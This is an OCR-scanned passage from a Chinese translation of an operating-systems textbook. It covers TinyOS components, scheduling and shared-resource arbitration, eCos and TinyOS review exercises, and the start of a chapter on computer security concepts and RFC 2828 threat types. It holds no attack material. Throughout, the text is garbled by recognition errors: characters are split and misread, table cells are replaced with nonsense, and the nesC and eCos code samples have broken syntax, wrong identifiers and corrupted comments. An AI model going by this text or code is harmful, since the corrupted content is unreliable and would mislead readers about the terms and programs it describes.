硬件 中 断 , 中 断 可 以 是 外 部 中 汤 、 定 时 器 事件 或 计数 器 事件 。 底层 组 件 的 事件 处 理 句柄 可 以 自己 
处 理 中 汤 或 者 向 组 件 上 层 传递 事件 消息 。 命令 可 以 传递 一 个 任务 ,此 后 会 发 送 一 个 事件 信号 。 在 
这 种 情况 下 ， 与 硬件 事件 毫 无 关联 。 

任务 可 以 视 为 有 三 个 阶段 。 调 用 者 向 模块 发 出 一 条 命令 。 模块 接着 响应 任务 。 然 后 模块 通过 
事件 通知 调用 者 ， 任 务 已 经 完成 。 

图 13.11a 中 描述 的 组 件 ，TimerM 是 TinyOS 定时 器 服务 的 一 部 分 。 这 个 组 件 提供 标准 控制 
和 定时 器 接口 以 及 时 钟 接口 。 提 供 者 实现 命令 (组 件 中 的 逻辑 ), 用 户 实现 事件 (组件 外 部 )。 许 
多 TinyOS 组 件 使 用 标准 控制 接口 来 进行 初始 化 、 启 动 或 停止 。TimerM 提供 如 下 逻辑 ， 将 硬件 
时 钟 映射 到 TinyOS 的 定时 器 抽象 中 。 时 钟 抽象 可 以 为 指定 的 时 钟 间 隔 进行 倒计时 操作 。 图 13.11a 
同样 显示 了 定时 器 M 接口 的 形式 规格 说 明 。 

与 定时 器 M 关联 的 接口 定义 如 下 : 
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interface StdControl { 
command result_t init(); 
command result_t start(); 
command result t stop(); 
} 
interface Timer { 
command result_t start(char type, uint32_t interval); 
command result t stop(); 
event result_t fired(); 


interface Clock { 
command result_t setRate(char interval, char scale); 
event result_t fire(); 


} 

组 件 通过 在 它们 的 接口 上 “布线 ”来 组 织 为 配置 ， 并 且 等 同 于 带 有 组 件 中 一 些 接口 的 配置 接 
口 。 简 单 的 例子 见 图 13.11b。 大 写 C 代表 组 件 ， 这 是 为 了 区 别 接口 ( 如 定时 器 ) 和 提供 接口 的 
组 件 ( 如 定时 器 C )。 大 写 M 代表 模块 。 当 一 个 逻辑 组 件 既 有 配置 又 有 模块 时 采用 这 样 的 命名 规 
则 。 定 时 器 C 组 件 ， 提 供 定时 器 接口 ， 该 接口 为 时 钟 和 LED 提供 者 连接 它 的 执行 ( TimerM )。 
另外 ， 任 何 使 用 TimerC 的 用 户 必 须 明 确 地 与 它 的 子 部 件 相连 。 


13.4.4 TinyOS 的 调度 程序 


TinyOS 的 调度 程序 操作 贯穿 整个 组 件 , 实际 上 , 所 有 使 用 TinyOS WHR AR RSE Ah 
机 系统 ,从 而 在 同一 时 间 , 全 部 组 件 的 全 部 任务 中 ,只 有 一 个 任务 在 执行 。 调 度 程序 是 一 个 单独 
的 组 件 。 在 任何 使 用 TinyOS 的 系统 中 都 必须 存在 的 一 部 分 。 

TinyOS 中 默认 的 调度 程序 是 一 个 简单 的 FIFO 队列 。 任务 递 送 给 调度 程序 ( 放 人 队列 ) 或 者 
作为 一 个 事件 的 结果 , 这 可 以 触发 递送 , 或 者 作为 一 个 正在 运行 的 任务 调度 另 一 个 任务 的 请 求 的 
结果 。 调度 程序 是 节能 的 ,这 就 意味 着 当 没 有 任务 在 队列 里 时 ,调度 程序 使 处 理 器 休眠 。 外 围 设 
备 保持 操作 , 通过 硬件 事件 向 最 底层 的 组 件 发 送信 号 ,这些 设备 中 的 某 个 可 以 唤醒 系统 。 一 旦 队 
列 清空 , 其 他 任务 就 只 能 作为 一 个 直接 硬件 事件 的 结果 来 被 调度 。 这 一 行为 使 得 高 效 的 电池 利用 
成 为 可 能 。 

调度 程序 经 历 过 两 代 发 展 。 在 TinyOS 1.x 中 ,针对 所 有 的 任务 有 一 个 共享 的 任务 队列 ， 一 
个 组 件 可 以 多 次 递送 一 个 任务 到 调度 程序 中 。 如 果 任 务 队 列 已 满 , 递送 操作 失败 。 网 络 栈 的 设计 
经 验 显 示 了 这 样 做 可 能 有 些 问题 , 任务 可 以 发 送 分 阶段 操作 完成 信号 : 如 果 发 送 失 败 , 上 述 组 件 
可 能 永远 阻塞 ， 等 待 一 个 完成 事件 。 在 TinyOS 2.x 中 ,每 个 任务 在 任务 队列 中 都 有 自己 的 保留 
槽 ,一 个 任务 只 能 被 发 送 一 次 。 只 有 任务 已 经 被 发 送 过 才 会 出 现 发 送 失 败 。 如 果 一 个 组 件 需 要 多 
次 发 送 一 个 任务 ， 它 可 以 设 定 一 个 间隔 状态 变量 ， 当 任务 执行 时 ， 它 自己 进行 发 送 。 这 个 语义 上 
微小 的 编号 简化 了 许多 组 件 代码 。 在 发 送 一 个 任务 前 , 比 先 测试 一 下 任务 是 否 已 经 发 送 过 该 任务 
更 好 的 方法 是 , 组 件 可 以 发 送 任 务 。 组 件 不 必 人 尝试 从 失败 和 再 次 尝试 中 恢复 。 代 价 是 每 个 任务 有 
一 个 字 节 来 表示 状态 。 用 户 可 以 使 用 不 同 的 调度 策略 来 取代 默认 的 调度 程序 , 例如 基于 优先 级 调 
度 或 者 时 间 期 限 调度 。 实际 上 , 不 再 使 用 抢占 和 时 间 片 ， 因 为 这 类 系统 产生 系统 开销 。 更 重要 的 
是 ， 它 们 违反 了 TinyOS 当前 的 模型 ， 该 模型 假定 任务 不 许 彼此 抢占 。 


13.4.5 配置 例子 


图 13.12 显示 了 一 个 由 硬件 和 软件 组 件 组 成 的 结构 。 这 是 个 简单 的 例子 ， 叫 做 Surge， 在 
LGAY03] 中 有 详细 描述 , 该 例子 完成 周期 性 传感器 采样 并 且 使 用 自 组 织 多 跳 路 由 ( ad-hoc multihop 
routing )， 以 便 在 无 线 网 络 中 传递 样本 至 基站 。 图 的 上 半 部 分 显示 了 Surge 的 组 件 ( 由 方 框 表示 ) 
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和 接口 ,通过 接口 它们 连接 起 来 (用 有 箭头 的 线 表示 )。SurgeM 组 件 是 应 用 级 的 组 件 ， 它 编写 配 
置 的 操作 。 


图 13.12b 显示 了 Surge 应 用 的 一 部 分 配置 。 后 面 是 SurgeM 定义 中 简要 的 摘录 。 
module SurgeM { 
provides interface StdControl; 
uses interface ADC; 
uses interface Timer; 
uses interface SendMsg; 
uses interface LEDs; 
} 
implementation { 
uint16 t sensorReading; 
command result_t StdControl.init() { 
return call Timer.start (TIMER_REPEAT, 1000); 


event result_t Timer.fired() { 
call ADC.getData(); 
return SUCCESS; 
} 
event result_t ADC.dataReady(uint16 t data) { 
sensorReading = data; 
- send message with data in it . 
return SUCCESS; 


} 





图 13.12 TinyOS 应 用 的 例子 
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这 个 例子 说 明了 TinyOS 方法 的 优点 。 软 件 由 互 连 的 简单 模块 组 成 ， 每 个 模块 定义 了 一 个 或 
几 个 任务 。 不 论 是 硬件 还 是 软件 ,组件 为 其 提供 简单 、 标 准 化 的 接口 。 也 就 是 说 ， 组 件 可 以 轻易 
地 替换 掉 ， 组 件 可 以 是 硬件 组 件 或 软件 组 件 ， 应 用 程序 员 看 不 出 它们 的 区 别 。 


13.4.6 TinyOS 的 资源 接口 


TinyOS 提供 一 个 简单 但 却 强大 、 方 便 处 理 资源 的 集合 。 在 TinyOS 中 对 资源 有 三 种 抽象 ; 

© 专 有 资源 : 子 系统 一 直 需 要 进行 独占 访问 的 资源 。 这 个 级 别 的 资源 不 需要 共享 策略 ， 因 
为 永远 只 有 一 个 组 件 在 请 求 使 用 。 专 用 资源 抽象 的 例子 包括 中 断 和 计数 器 。 

© 虚拟 资源 : 虚拟 资源 的 客户 都 将 它 当 做 一 个 专用 的 资源 来 处 理 ， 所 有 虚拟 实例 建立 在 一 
个 真实 资源 之 上 ， 可 以 有 多 个 。 当 真实 资源 不 需 被 互 斥 保护 时 ， 可 以 使 用 虚拟 抽象 。 时 
钟 或 定时 器 就 是 一 个 例子 。 

@ 共享 资源 : 共享 资源 通过 一 个 仲裁 器 组 件 来 提供 对 专 有 资源 的 访问 。 仲 裁 器 强迫 执行 互 
FE, 一 次 仅 允 许 一 个 使 用 者 ( 称 为 客户 ) 对 资源 进行 访问 ， 并 且 人 允许 客户 为 资源 加 锁 。 

在 本 章 剩 余 的 部 分 ， 我 们 简要 定义 一 个 TinyOS 共享 资源 。 仲 裁 器 决定 每 次 哪个 客户 对 资源 

进行 访问 。 当 客户 掌握 了 一 个 资源 , 它 可 以 完全 没有 限制 地 去 控制 资源 。 仲 裁 器 假定 客户 之 间 是 
协作 的 , 且 仅 在 需要 的 时 候 获 取 资 源 并 且 在 不 需要 的 时 候 不 再 持 有 该 资源 ,客户 明确 地 释放 资源 : 
仲裁 器 无 法 强制 收回 资源 。 

图 13.13 显示 了 一 个 共享 资源 的 配置 ， 用 于 提供 对 真实 资源 的 访问 。 与 每 个 待 共享 资源 相连 

接 的 是 仲裁 器 组 件 。 仲 裁 器 强制 执行 一 个 策略 ， 人 允许 客户 为 资源 加 锁 , 使 用 并 释放 资源 。 共 享 资 
源 配 置 为 客户 提供 了 下 列 接口 : 

@ 资源 : 客户 对 此 接口 发 出 一 个 请 求 ， 来 请 求 访问 资源 。 如 果 资 源 已 被 加 锁 ， 仲 裁 器 就 会 
将 请 求 放 人 一 个 队列 。 当 客户 完成 对 资源 的 访问 时 ， 它 对 此 接口 发 送 一 条 释放 命令 。 

@ 资源 请 求 : 与 资源 接口 类 似 。 在 这 种 情况 下 ， 客 户 可 以 掌握 一 个 资源 ， 直 到 客户 被 通知 
有 其 他 客户 需要 资源 为 止 。 

@ 资源 配置 : 在 客户 同意 访问 一 个 资源 之 前 ， 本 接口 允许 该 资源 自动 配置 。 提 供 资源 配置 
接口 的 组 件 使 用 这 些 下 层 专用 资源 的 接口 来 配置 进行 操作 所 需要 的 模式 中 的 一 个 。 

@ 特定 资源 接口 : 一 旦 客户 可 以 访问 资源 ， 它 使 用 特定 资源 接口 来 改变 资源 的 数据 和 控制 
资源 的 信息 。 另 外 ， 对 专用 资源 来 说 ， 共 享 资源 配置 由 两 个 组 件 构成 。 仲 裁 器 同意 一 个 
客户 的 访问 和 配置 请 求 ， 并 且 强 制 为 真实 资源 加 锁 。 共 享 资源 组 件 则 是 客户 和 真实 资源 
间 进 行 数 据 交 互 的 一 个 媒介 。 从 仲裁 器 向 共享 资源 组 件 传 递 的 仲裁 器 信息 控制 客户 到 下 
层 资 源 的 访问 。 


£\ A £\ 
CROCO 





图 13.13 ”共享 资源 配置 
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13.5 ”推荐 读物 和 网 站 


[KOOP96] 提 供 了 对 府 入 式 系统 需求 的 系统 的 讨论 ，[STAN96] 是 一 个 关于 实时 和 内 和 人 式 系统 很 有 用 的 


概览 。 


码 。 


[MASS03] 和 [ECOS07] 都 详细 描述 了 eCos 的 内 部 ，[THOM01] 为 内 核 提供 了 简要 的 概览 和 一 些 示 例 代 
[LARM05] 给 出 了 eCos 配置 过 程 更 详细 的 描述 。 
[HILL00] 给 出 了 TinyOS 的 概述 和 基本 设计 原理 。[GAY05] 对 使 用 TinyOS 软件 设计 策 率 进行 了 有 趣 的 


讨论 。[BUON01] 提 供 了 使 用 TinyOS 构建 网 络 或 者 无 线 传感器 的 很 好 的 示例 。 还 有 两 个 对 于 当前 版 本 的 
TinyOS 很 好 的 参考 书目 是 [GAY03] 和 [LEVI05]。 


BUON01 Buonadonna, P; Hill, J.; and Culler, D. “Active Message Communication for Tiny Networked 
Sensors.” Proceedings, IEEE INFOCOM 2001, April 2001 

ECOS07 eCosCentric Limited, and Red Hat, Inc. eCos Reference Manual 2007. http:// www.ecoscentric. 
com/ecospro/doc/html/ref/ecos-ref. html 

GAY03 Gay, D., et al.““The nesC Language: A Holistic Approach to Networked Embedded Systems.” Proceedings 
of the ACM SIGPLAN 2003 Conference on Programming Language Design and Implementation, 2003. 

GAY0S Gay, D.; Levis, P.; and Culler, D. “Software Design Patterns for TinyOS.” Proceedings, Conference on 
Languages, Compilers, and Tools for Embedded Systems, 2005. 

HILL00 Hill, J., et al. “System Architecture Directions for Networked Sensors. ” Proceedings, Architectural 
Support for Programming Languages and Operating Systems. 2000. 

KOOP96 Koopman, P “Embedded System Design Issues (the Rest of the Story).” Proc eedings, 1996 
International Conference on Computer Design, 1996. 

LARM0S Larmour, J.“How eCos Can Be Shrunk to Fit.” Embedded Systems Europe, May 2005. www. 
embedded.com/europe/esemay05.htm 

LEVI0S Levis, P, et al. “T2: A Second Generation OS For Embedded Sensor Networks.” Technical Report 
TKN-05-007, Telecommunication Networks Group, Technische Universitat Berlin, 2005. 
http://csl.stanford.edu/~pal/pubs.btml 

MASS03 Massa, A. Embedded Software Development with eCos. Upper Saddle River, N J: Prentice Hall, 2003. 

STAN96 Stankovic, J., et al. “Strategic Directions in Real-Time and Embedded Systems.” ACM Computing 
Surveys, December 1996. 

THOMOI Thomas, G. “ eCos: An Operating System for Embedded Systems.” Dr. Dobb’s Journal, January 
2001. 


推荐 网 站 


© Embedded.com: 很 多 种 岩 人 式 系 统 的 信息 
© eCos: eCos 软件 下 载 、 信 息 以 及 链接 
@ TinyOS Community Forum: TinyOS 软件 下 载 、 信 息 以 及 链接 


13.6 ”关键 术语 、 复 习题 和 习题 
关键 术语 


eCos HARK BE TinyOS KARRERA 


复习 题 


13.1 
13.2 
13.3 
13.4 
13.5 


13.6 


HARRAR ABE? 

嵌入 式 系 统 典 型 的 需求 或 限制 有 哪些 ? 

什么 是 嵌入 式 操作 系统 ? 

嵌 人 式 操作 系统 的 关键 特点 有 哪些 ? 

解释 一 下 ， 相 对 于 为 特定 目的 构建 的 说 入 式 操 作 系 统 ， 基 于 现 有 的 商业 操作 系统 的 奉 人 人 式 操作 系统 
有 哪些 优点 和 缺点 ? 

指导 eCos 内 核 设 计 的 主要 目标 有 哪些 ? 


13.7 
13.8 
13.9 
13.10 
13.11 
13.12 
13.13 
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在 eCos 中 ， 中 断 服务 程序 和 延迟 服务 程序 有 哪些 不 同 ? 
在 eCos 中 ， 有 哪些 并 发 机 制 可 用 ? 
什么 是 TinyOS 的 目标 应 用 程序 ? 

TinyOS 的 设计 目标 有 哪些 ? 

什么 是 TinyOS 的 组 件 ? 

TinyOS 操作 系统 的 软件 组 成 是 怎样 的 ? 

TinyOS 的 默认 调度 策略 是 怎样 的 ? 


习题 


13.1 


13.7 


13.8 


在 eCos 内 核 中 的 设备 驱动 程序 接口 的 介绍 中 ( DR 13.2 ), 推 荐 设备 驱动 程序 应 该 使 用 _inteave( ) 
变量 来 申请 和 释放 自 旋 锁 ， 而 不 是 使 用 _intsave() 变量 。 请 解释 原因 。 

还 是 如 表 13.2 中 介绍 ,尽量 少 使 用 cyq_drv_spinlock_spin, 在 这 种 情况 不 会 发 咎 死 锁 ( deadlock ) 
/ 活 锁 ( livelock )。 请 解释 原因 。 

ER 13.2 中 , (HH cyg_drv_spinlock destroy 时 有 哪些 限制 ? 请 解释 。 

ER 13.2 中 , 使 用 cyg_drv_mutex _destroy 时 有 哪些 限制 ? 

为 什么 eCos 的 位 图 调度 程序 不 支持 时 间 片 ? 

Tiny-OS 不 是 抢占 式 的 (除了 中 断 处 理 外 ) ， 因 此 需要 将 长 时 间 运 行 的 计算 密集 型 任务 分 为 多 个 更 
小 的 任务 , 以 便 保证 系统 对 其 他 事件 的 响应 , 这 一 点 很 重要 。 上 述 方式 被 称 为 分 相 编程 ( split-phase ) 。 
下 面 是 一 个 例子 : 


NON Split-Phase 


void compute() { 
computed (); 
computel (); 
compute2 () ; 

} 

Split-Phase 


void compute_split_phase() { 
computed() { 
state = COMPUTE 1; 
call Timer.startOneShot (100) ; 
} 
event void Timer.fired() { 
switch(state ) { 
case COMPUTE 1 : computel(); break; 
case COMPUTE_2 : compute2(); break; 
default : return; 


} 
state++; 
call Timer.startOneShot (100) ; 


} 

整个 三 步 计算 过 程 中 ， 这 一 分 相 代 码 会 在 一 次 性 定时 器 控制 下 周期 性 地 睡眠 。 

a ) 这 一 机 制 是 如 何 实现 构建 响应 灵敏 系统 目标 的 ? 

b) 分 享 编程 的 代价 是 什么 ? 

图 13.14 准备 用 于 eCos 内 核 的 代码 列表 。 

a) 解释 一 下 代码 的 操作 。 假 设 B 线程 首先 执行 ， 然 后. 在 一 些 事件 发 生 后 A 线程 开始 执行 。 

b) 第 30 行 中 , 在 调用 cyg_cond_wait 时 ， 如 果 互 斥 量 解 锁 并 等 待 代码 执行 ,会 发 生 什么 情况 ?是 否 
原子 操作 ? 

c) 为 什么 需要 第 26 行 中 的 while HAH? 

在 eCos 自 旋 锁 的 讨论 中 ， 有 一 个 例子 ,如果 两 个 不 同 优先 级 的 线程 可 以 竞争 同一 个 自 旋 锁 , 例子 中 

解释 了 为 什么 自 旋 锁 不 能 用 于 单 处 理 器 系统 。 解 释 一 下 ， 如 果 仅 有 相同 优先 级 的 线程 可 以 申请 同一 
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a ee e 
个 自 旋 锁 ， 为 什么 该 问题 仍然 存在 ” 

13.9 Tiny-OS 1.x 维护 一 个 独立 的 电路 缓冲 存储 器 作为 任务 队列 。 如 果 这 个 队列 已 经 满 了 ， 那 么 分 配 一 个 
任务 到 该 队列 将 会 失败 , 发 出 请 求 的 任务 没有 别 的 选择 ， 只 能 放弃 这 一 尝试 。 假 定 任务 队列 具有 256 
个 槽 ， 考 虑 如 下 场景 ; 

1) A 任务 发 送 了 一 个 网 络 包 ， 等 待 接收 者 的 响应 。 

2) B 任务 以 500Hz 的 频率 开始 从 一 个 传感器 采样 数据 ; 每 个 数据 的 采样 生成 一 个 被 分 配 到 任务 队列 
BY CHES AES C 需 要 3 毫秒 才能 完成 ( 你 可 以 任务 所 有 的 系统 开销 已 经 包含 到 这 一 运行 时 间 中 )。 
a) 随 着 任务 C 的 分 配 ， 多 长 时 间 会 存 满 电路 缓冲 存储 器 ? 
b) 如 果 任 务 A 期 望 收 到 的 响应 在 1600 毫秒 内 没有 到 来 ， 会 发 生 什 么 ? 
c) 如 何 重 新 配置 Tiny-OS 的 任务 队列 来 纠正 任务 A 的 饥饿 状况 ? 

13.10 ”考虑 使 用 一 种 具有 两 种 操作 模式 的 传感器 的 Tiny-OS 平台 。SENSE 模式 消耗 最 少 的 能 量 ， 但 是 仅 
让 传感器 检测 物理 事件 和 产生 中 断 。 为 了 取得 事件 相关 的 数据 ,传感器 必须 调 为 SENSE+COMM 模 
式 ， 才 能 将 数据 传递 给 CPU, Æ SENSE 模式 下 ， 每 秒 消耗 E/8 单位 的 能 量 ， 而 在 SENSE+COMM 
模式 下 ， 每 秒 消 耗 E/4 单位 的 能 最 。 从 SENSE+COMM 转换 为 SENSE 模式 不 消耗 任何 能 量 ， 而 从 
SENSE 到 SENSE+COMM 模式 会 消耗 E 单位 的 能 量 。 模 式 的 转换 基本 上 是 瞬间 完成 的 。 

如 果 我 们 需要 在 进行 物理 事件 时 使 用 尽 可 能 少 的 能 量 ， 有 如 下 3 种 能 量 消 耗 机 制 : 
1) 尽 可 能 地 将 传感器 保持 在 SENSE 模式 。 
2 ) 任何 时 候 都 将 传感器 保持 在 SENSE+COMM 模式 。 
3) 在 SENSE+COMM 模式 下 运行 1 秒 钟 ， 然 后 切换 到 低能 耗 的 SENSE 模式 。 
a) 为 上 述 3 种 机 制 写 一 个 函数 It_m)， 返 回 在 等 待 下 一 个 事件 的 时 候 消 耗 的 能 量 。 其 中 tn 作为 
下 个 事件 到 达 的 时 间 有 没有 明显 的 优化 机 制 ? 
b) 为 上 述 3 种 机 制 写 一 个 模拟 程序 ， 打 印 其 消耗 的 所 有 能 景 。 两 个 输入 参数 分 别 是 事件 发 生 的 
最 大 间隔 时 间 CW) ， 和 要 模拟 的 事件 数量 N) 。 假 定 事件 的 间隔 时 间 是 0 到 W 之 间 的 随 
机 数 。 对 于 混合 机 制 3 ) FP, AU, W-1] 间 的 值 t， 且 以 1 秘 的 间隔 计算 多 个 能 耗 情况 。 
c) 对 于 每 次 模拟 ， 至 少 使 用 10000 个 事件 ， 同 时 最 大 时 间 间 隔 从 1 到 25 秒 间 改变 。 
你 的 模拟 结果 是 不 是 确认 了 你 对 问题 b 的 答案 ? 


unsigned char buffer empty = true; 
cyg_mutex_t mut_cond var; 
cyg_cond-t cond_var; 


void thread_a( cyg_addrword_t index } 


while (1) { 1/ ~ ASHER 
/1 ERUEBHRARHR 


// BK HBR 
buffer empty = false; 


oovanawn= 


cyg_mutex_lock( smut cond var ); 
cyg_cond_signal{ &cond_ var ); 
cyg_mutex_unlock({ smut cond var ); 
} 
void thread b( cyg_addrword t index } 


{ 
while ( 1) { /7 RITAN 
eyg_mutex_lock{ smut_cond var ); 


while { buffer empty == true ) cyg_cond wait{ teond_var ); 
/7 AS COREE 


Jf 设置 标志 说 明 缓冲 区 中 的 数据 已 处 理 
buffer empty = true; 


cyg_mutex_unlock( &mut cond var ); 


17 SFR eK PRGN 
} 





13.14 条件 变量 示例 代码 





在 电子 通信 、 病 毒 和 黑客 、 电 子 窃听 以 及 电子 欺诈 流行 的 时 代 ， 安 全 成 为 一 个 核心 的 内 容 。 
两 种 趋势 的 共同 作用 使 得 这 个 话题 尤其 有 趣 。 首 先 ,计算 机 系统 和 网 络 互联 的 爆炸 性 增长 ， 增 加 
了 机 构 或 个 人 对 于 信息 存储 和 交互 的 依赖 。 反 过 来 ， 这 加 深 了 保护 数据 、 资 源 不 被 泄露 的 需求 、 
保证 数据 和 消息 的 认证 的 需求 ， 以 及 防范 来 自 于 网 络 的 攻击 的 需求 。 第 二 ， 密码 学 和 计算 机 安全 
学 科 的 成 熟 ， 使 得 实际 的 、 随 时 可 用 的 应 用 得 到 了 发 展 ， 以 增强 安全 性 。 


第 七 部 分 导读 


第 14 章 计算 机 安全 威胁 


第 14 章 从 计算 机 安全 概念 简介 出 发 ， 然 后 概述 了 计算 机 安全 威胁 。 本 章 讲 述 了 四 种 主要 的 
威胁 : 病毒 、 蠕虫 、 僵尸 (bot ) 和 rootkit. 


第 15 章 计算 机 安全 技术 


第 15 章 介绍 了 应 对 计算 件 安全 威胁 的 重要 技术 ,包括 访问 控制 、 入 侵 检 测 、 恶 意 软件 防御 ， 
和 应 对 缓冲 区 溢出 攻击 的 技术 。 


第 14 章 计算 机 安全 威胁 


计算 机 安全 领域 非常 广泛 ， 覆 盖 了 物理 的 和 管理 层面 的 控制 ， 还 包括 自动 控制 。 在 本 章 中 ， 
我 们 只 限于 自动 化 的 安全 工具 。 接 下 来 是 对 计算 机 安全 相关 概念 和 计算 机 安全 威胁 的 介绍 , 最 后 
讲解 两 大 类 安全 威胁 : 入 侵 者 和 恶意 软件 。 

加 密 在 计算 机 安全 威胁 和 计算 机 安全 技术 中 都 扮演 着 重要 角色 。 


14.1 计算 机 安全 的 概念 


NIST《 计 算 机 安全 手册 》[ NIST95 ] 对 计算 机 安全 这 个 术语 的 定义 如 下 : 

计算 机 安全 : 为 了 实现 信息 系统 资源 (包括 硬件 、 软 件 、 固 件 、 信 息 /数据 和 通信 ) 的 完整 
性 、 可 用 性 和 机 密 性 这 些 目 标 ， 而 在 一 个 自动 化 的 信息 系统 上 实施 防护 。 

这 个 定义 包含 计算 机 安全 核心 的 三 个 目标 : 

@ HEt (confidentiality): 这 个 术语 覆盖 了 两 个 相近 的 概念 

> 数据 9 机 密 性 : 保证 私有 的 或 秘密 的 信息 对 未 授权 个 体 不 可 用 或 者 不 可 见 。 
> BH: 保证 个 体能 够 控制 或 者 影响 与 其 相关 的 信息 的 收集 和 保存 ， 以 及 由 他 们 发 送 或 
发 送 给 他 们 的 信息 对 其 是 可 见 的 。 
@ 完整 性 (integrity): 这 个 术语 覆盖 了 两 个 相近 的 概念 : 
> 数据 完整 性 : 保证 信息 和 程序 只 在 一 种 指定 的 和 授权 的 方式 下 被 修改 。 
> 系统 完整 性 : 保证 系统 只 在 一 种 不 受 影响 的 方式 下 执行 它 应 有 的 功能 , 防止 蓄意 的 或 
无 意 的 非 授权 系统 操作 。 
@ 可 用 性 (availability): 保证 系统 能 及 时 地 工作 ， 服 务 器 对 授权 的 用 户 不 会 拒绝 。 
这 三 个 概念 构成 了 如 图 14.1 所 示 的 CIA 三 角 。 这 三 个 概念 包含 了 针对 数据 、 信 息 和 计算 机 
服务 的 基本 安全 目标 。 比 如 ， NIST 标准 FIPS 199《 Standards for Security Categorization of Federal 
Information and Information Systems》 将 机 密 性 、 完 整 性 和 可 用 性 作为 信息 和 信息 系统 的 三 个 安 
4 Hts. FIPS PUB 199 从 需求 角度 为 这 三 个 目标 提供 了 一 
个 有 用 的 分 类 和 每 个 分 类 里 对 安全 性 损失 的 定义 。 
@ 机 密 性 : 维护 信息 访问 和 泄露 的 授权 限制 ,包括 防 
护 个 人 隐私 和 专 有 信息 。 机密 性 的 损失 是 指 非 授权 
的 信息 泄露 。 

e 完整 性 : 防止 信息 被 不 恰当 地 修改 或 清除 ,包括 保 
证 信息 的 不 可 否认 和 认证 。 完整 性 的 损失 是 指 非 授 
权 的 信息 修改 或 清除 。 

@ 可 用 性 : 保证 及 时 可 靠 的 信息 访问 和 使 用 。 可 用 性 
的 损失 是 指 对 信息 或 信息 系统 的 访问 、 使 用 中 断 。 图 14.1 安全 需求 的 三 个 方面 





© RFC 2828 (Internet 安全 术语 》 中 定义 信息 为 “事实 和 思想 ， 可 以 表示 编码 ) 为 各 种 数据 形式 ”， 以 及 数据 
为 “以 特定 物理 形式 表达 的 信息 ,通常 是 具有 一 定 含义 的 符号 序列 ， 特 别 是 能 够 由 计算 机 处 理 和 产生 的 信息 
表达 形式 ”。 各 种 安全 文献 对 这 两 个 术语 的 定义 大 同 小 异 ， 本 章 也 不 例外 。 
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尽管 CIA 三 角 定 义 的 安全 目标 被 广泛 认可 ， 但 在 一 些 安 全 场景 下 还 可 以 看 到 ， 需 要 额外 的 
一 些 概念 才能 展示 一 个 完整 的 图 景 。 其 中 最 常见 的 两 个 概念 如 下 : 

认证 : 指 的 是 真实 性 ， 可 被 验证 和 信任 ; 一 次 会 话 、 一 条 消息 或 消息 的 产生 过 程 中 对 其 有 效 
性 的 信任 。[ 这 意味 着 要 验证 用 户 身份 是 不 是 如 他 们 所 声称 的 那样 , ] 以 及 每 一 个 系统 的 输入 是 不 
是 来 自 一 个 可 信 的 源 。 

问 责 : 是 对 一 个 实体 的 行为 进行 追踪 而 产生 的 安全 目标 。 它 支持 不 可 否认 性 、 威 慑 性 、 错 误 
隔离 性 、 入 侵 检 测 和 阻止 ， 以 及 事后 恢复 和 合法 性 。[ 因为 真正 安全 的 系统 还 不 是 一 个 可 实现 的 
目标 ， 我 们 必须 能 够 追踪 安全 性 的 破坏 。] 系统 必须 对 它们 的 行为 进行 记录 ， 以 便 事后 分 析 或 者 
解决 交易 纠纷 。 

请 注意 FIPS PUB 199 在 完整 性 下 面包 含 了 认证 性 ， 


14.2 威胁、 攻击 和 资产 
现在 我 们 来 看 看 与 计算 机 安全 联系 紧密 的 威胁 、 攻 击 和 资产 。 


14.2.1 威胁 和 攻击 


基于 RFC 2828 的 表 14.1 描述 了 四 种 威胁 ， 并 列 出 了 导致 每 种 安全 威胁 的 各 种 类 型 的 攻击 。 

非 授权 泄露 是 一 种 对 机 密 性 的 威胁 。 下 面 几 种 类 型 的 攻击 可 以 导致 这 种 威胁 ; 

@ 暴露 : 这 可 能 是 故意 的 ， 如 内 部 人 员 有 意 泄 露 敏感 信息 〈 如 信用 卡号 ) 给 外 部 人 员 。 也 
可 能 是 人 、 硬 件 或 者 软件 错误 的 结果 ， 使 得 某 个 实体 能 够 非 授 权 地 获得 敏感 数据 。 在 这 
方面 有 大 量 的 例子 ， 比 如 学 校 意 外 地 把 学 生 的 机 密 信息 公布 在 网 上 。 

o 窃听 : 窃听 是 一 种 常见 的 通信 中 的 攻击 。 在 共享 的 局 域 网 CLAN ) 内 ， 比 如 无 线 LAN 或 
者 广播 的 以 太 网 ,任何 设备 接 人 LAN 之 后 都 能 收 到 发 给 其 他 设备 的 数据 包 。 在 因特网 上 ， 
有 些 黑客 能 获取 E-mail 的 流量 和 其 他 数据 的 转发 。 所 有 这 些 情况 都 给 数据 的 非 授权 访问 
提供 了 潜在 的 可 能 。 

@ 分 析 : 一 个 众所周知 的 例子 是 流量 分 析 , 攻击 者 能 通过 监测 网 络 中 的 流量 模式 获取 信息 ， 
比如 特定 主机 之 间 的 流量 。[ 另 一 个 例子 是 一 个 只 有 有 限 的 访问 权限 的 用 户 分 析 数 据 库 中 
的 细节 信息 ， 这 可 以 通过 重复 查询 的 联合 结果 产生 的 分 析 来 实现 。] 

@ AR: 人 侵 的 一 个 例子 是 攻击 者 通过 攻陷 系统 的 访问 控制 保护 来 获取 对 敏感 数据 的 非 授 
权 访 问 。 


表 14.1 基于 RFC 2828 的 威胁 列表 和 每 种 威胁 对 应 的 攻击 行为 


威 胁 攻 击 
BR: 敏感 数据 直接 泄露 给 非 授 权 实体 
BM: 非 授权 实体 在 授权 的 源 和 目的 进行 通信 的 时 候 ， 直 接 访 问 其 敏感 数据 
分 析 : 非 授权 实体 通过 分 析 遂 信 特 征 间接 访问 敏感 数据 ( 在 通信 中 可 能 不 是 直接 
包含 敏感 数据 ) 
AR: 非 授 权 实体 通过 破坏 系统 安全 防护 访问 敏感 数据 
欺骗 : 可 能 导致 授权 实体 收 伪装 : 一 个 非 授 权 实体 获得 系统 访问 权限 ， 或 者 通过 假装 成 授权 实体 实施 恶意 行为 
到 或 者 信任 错误 数据 的 环境 伪造 : 用 错误 数据 欺骗 授权 的 实体 
或 事件 抵赖 : 一 个 实体 若 骗 另 一 个 实体 ， 抵 赖 某 个 行为 引发 的 责任 
失效 : 通过 使 系统 部 件 失效 中 断 系 统 操 作 
毁坏 : 恶意 修改 系统 功能 或 数据 来 改变 系统 的 操作 
阻碍 : 通过 阻碍 系统 操作 中 断 系 统 服务 
BH: 系统 服务 或 功能 被 非 挪用 : 一 个 实体 非 授 权 地 以 逻辑 方式 或 物理 方式 控制 系统 资源 
授权 实体 控制 的 环境 或 事件 滥用 : 使 系统 部 件 实 施 对 系统 安全 性 有 害 的 功能 或 服务 


